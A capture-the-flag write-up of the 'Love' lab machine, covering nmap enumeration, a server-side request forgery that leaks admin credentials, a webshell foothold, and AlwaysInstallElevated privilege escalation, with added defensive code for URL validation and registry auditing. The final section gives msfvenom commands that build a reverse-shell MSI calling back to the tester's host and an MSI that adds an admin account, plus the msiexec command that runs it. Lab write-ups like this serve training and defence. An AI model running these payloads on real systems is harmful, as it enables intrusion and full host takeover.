# Love

## Enum

### NMAP
```
└─$ sudo nmap -sC -sV 10.10.10.239
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-10 06:28 EDT
Nmap scan report for 10.10.10.239
Host is up (0.076s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp  open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
445/tcp  open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open  mysql?
| fingerprint-strings:
|   LDAPSearchReq, SMBProgNeg, X11Probe, afp:
|_    Host '10.10.16.65' is not allowed to connect to this MariaDB server
5000/tcp open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.80%I=7%D=5/10%Time=60990AD1%P=x86_64-pc-linux-gnu%r(SM
SF:BProgNeg,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.65'\x20is\x20not\x2
SF:0allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(X11Pro
SF:be,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.65'\x20is\x20not\x20allow
SF:ed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(LDAPSearchRe
SF:q,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.65'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(afp,4A,"F\0\0
SF:\x01\xffj\x04Host\x20'10\.10\.16\.65'\x20is\x20not\x20allowed\x20to\x20
SF:connect\x20to\x20this\x20MariaDB\x20server");
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h41m28s, deviation: 4h02m30s, median: 21m27s
| smb-os-discovery:
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Love
|   NetBIOS computer name: LOVE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-05-10T03:50:08-07:00
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-05-10T10:50:07
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.52 seconds
```
### HTTP
The certificate gives hints about the domain and a user.

http://love.htb/ shows “Voting System using PHP”.

Exploring http://staging.love.htb/ there is a page, beta.php, which lets the user enter a URL; the server fetches that file and “scans” it.

We try this out. We are not able to reach https://10.10.10.239:5000/ directly.

If we enter this URL in the file scanner, the server fetches it for us and we get some creds for the Voting System:

```
Vote Admin Creds admin: @LoveIsInTheAir!!!!
```

i.e. `admin:@LoveIsInTheAir!!!!`.
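The weakness behind the file scanner is that the server will fetch any URL the user supplies, including loopback and internal addresses such as port 5000 on the staging host. The following is an added example (it is not code from the Voting System or from this write-up) of the validation a server-side fetcher should perform before making the request. Function and constant names are the author's own; `resolve_all` does real DNS, while `static_resolver` is an offline stand-in for tests.

```python
"""Hardened target validation for a server-side "fetch and scan" feature.

Added example, not the Voting System's own code. The fetcher must refuse
any URL that would make the server talk to itself or to its internal
network, whether the target is given as a literal address or as a name
that resolves to one.
"""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}  # a public fetch has no business on port 5000 etc.


def resolve_all(hostname):
    """Resolve a hostname to every A/AAAA record (real DNS lookup)."""
    infos = socket.getaddrinfo(hostname, None, proto=socket.IPPROTO_TCP)
    return [ipaddress.ip_address(info[4][0]) for info in infos]


def static_resolver(*addrs):
    """Build a fake resolver returning fixed addresses (for offline tests)."""
    return lambda hostname: [ipaddress.ip_address(a) for a in addrs]


def is_internal(ip):
    """True for any address a public fetcher must never contact."""
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def check_fetch_target(url, resolver=resolve_all):
    """Return (ok, reason, ips) for a user-supplied URL.

    Every address the host resolves to is checked, so a name that mixes a
    public record with an internal one is rejected as well.
    """
    try:
        parts = urlsplit(url)
        port = parts.port  # raises ValueError on a malformed port
    except ValueError:
        return False, "malformed url", []
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, "scheme not allowed", []
    if not parts.hostname:
        return False, "no host", []
    if parts.username or parts.password:
        return False, "userinfo not allowed", []
    if port is None:
        port = 443 if scheme == "https" else 80
    try:
        ips = [ipaddress.ip_address(parts.hostname)]  # literal address
    except ValueError:
        try:
            ips = resolver(parts.hostname)
        except (socket.gaierror, OSError):
            ips = []
    if not ips:
        return False, "host does not resolve", []
    for ip in ips:
        if is_internal(ip):
            return False, f"resolves to internal address {ip}", ips
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed", ips
    return True, "ok", ips
```

Two caveats that the check alone does not cover: the fetcher must connect to the address it validated rather than resolving the name a second time (otherwise a DNS record that changes between lookups bypasses the check), and every HTTP redirect must be run through the same validation before it is followed.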
## User and foothold

With the credentials, we should be able to exploit this. A recent exploit for the Voting System seems to be applicable in this case. Uploading the webshell and triggering it gives us user.
## Root

### Privilege Escalation

Running winPEAS we observe that AlwaysInstallElevated is on, which we can confirm:

```
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
```
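For anyone auditing this finding rather than exploiting it: Windows only honours AlwaysInstallElevated when the value is set to 1 in both HKLM and HKCU, so the HKCU query above needs its HKLM counterpart (`reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated`) before the box can be called vulnerable. The following added example (not part of the write-up) parses the text that `reg query` prints for each hive and turns the pair into a finding. The sample outputs are constructed here; the HKCU one mirrors the write-up's output and the HKLM one is made up for the example.

```python
"""Audit helper for the AlwaysInstallElevated policy.

Added example, not part of the write-up. Feed it the output of
`reg query <hive>\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
/v AlwaysInstallElevated` for HKLM and HKCU; the policy is only effective
when both hives set the value to 1.
"""
import re

VALUE_NAME = "AlwaysInstallElevated"

# Constructed sample outputs. The HKCU text mirrors the write-up; the HKLM
# text is invented for this example.
SAMPLE_HKCU = """
HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
SAMPLE_HKLM = """
HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
# What reg.exe prints when the key or value does not exist at all.
SAMPLE_MISSING = ("ERROR: The system was unable to find the specified "
                  "registry key or value.")

# One value line:  <name>  <REG_TYPE>  <data>
_VALUE_RE = re.compile(r"^\s*(\S+)\s+(REG_\w+)\s+(\S.*?)\s*$")


def parse_reg_query(text):
    """Parse `reg query` output into {key_path: {name: (type, raw_data)}}."""
    result, current = {}, None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            current = line.strip()
            result[current] = {}
            continue
        m = _VALUE_RE.match(line)
        if m and current is not None:
            result[current][m.group(1)] = (m.group(2), m.group(3))
    return result


def policy_enabled(text):
    """True if AlwaysInstallElevated is a non-zero REG_DWORD in this output."""
    for values in parse_reg_query(text).values():
        entry = values.get(VALUE_NAME)
        if entry and entry[0] == "REG_DWORD":
            return int(entry[1], 16) != 0  # reg.exe prints DWORDs as 0x...
    return False  # absent value means the policy is off


def assess(hklm_output, hkcu_output):
    """Combine both hives into a finding a report can use."""
    hklm = policy_enabled(hklm_output)
    hkcu = policy_enabled(hkcu_output)
    if hklm and hkcu:
        return ("HIGH: AlwaysInstallElevated is set in HKLM and HKCU; "
                "any user can install an MSI with SYSTEM privileges")
    if hklm or hkcu:
        return ("INFO: AlwaysInstallElevated is set in only one hive; "
                "not effective, but a misconfiguration to remove")
    return "OK: AlwaysInstallElevated is not enabled"


if __name__ == "__main__":
    print(assess(SAMPLE_HKLM, SAMPLE_HKCU))
    print(assess(SAMPLE_MISSING, SAMPLE_HKCU))
```

The fix on the host side is to clear the value in both hives (or the matching Group Policy setting under Computer Configuration and User Configuration, Windows Installer, "Always install with elevated privileges") and to alert on MSI installs launched from user-writable paths by non-administrators.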
We follow the usual steps (an alternative payload is an MSI that adds a local admin, built with `msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi`, the no-UAC format):

- Create the payload: `msfvenom -p windows/x64/meterpreter/reverse_tcp -f msi lhost=10.10.16.65 lport=9005 -o bad.msi`
- Execute the payload on the victim: `msiexec /quiet /qn /i C:\Users\Phoebe\Desktop\bad.msi`
- Profit